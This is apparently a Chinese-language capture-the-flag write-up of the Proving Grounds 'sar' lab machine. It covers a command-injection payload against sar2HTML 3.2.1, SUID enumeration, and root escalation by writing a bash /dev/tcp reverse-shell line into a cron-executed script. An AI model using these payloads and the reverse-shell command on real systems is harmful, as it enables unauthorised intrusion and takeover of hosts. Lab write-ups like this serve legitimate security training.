[PGPlay] sar 靶機 Write-up

2024, Jun 03    

本系列為 Proving Grounds Play Free 靶機

Port Scan 後發現 含有80 Port

進入系統後發現 含有一個預設頁面

查看 robots.txt 發現有個 sar2HTML

讀取 sar2HTML頁面

左上角有 sar2HTML 版本字樣 丟google 就有Exploit 可參考

sar2HTML V3.2.1 含有 Command Injection 漏洞

payload為 index.php?plot=;id

發現可 Command Injection 直接 revshell

接著 cat local.txt

提權

提權部分卡了許久

查看 uname -a 無發現可利用 Exploit

使用 find / -perm -4000

find / -perm -04000 -type f -ls

發現 /bin/ping 有超級使用者

但無 gcc 功能

最後去看 Write up 發現使用 Linpeas.sh 去執行

會出現 /var/www/finally.sh 權限為root, 使用 crontab 每五分鐘執行一次

查看 finally.sh 發現內容為執行 write.sh

write.sh 擁有者為 www-data 可進行編輯

輸入反連指令 改寫並覆蓋內容

echo '**bash** -i >& /dev/tcp/**192.168.45.206**/**5555** 0>&1' > write.sh

開啟 nc 等待五分鐘後 取得 root 權限 讀取proof.txt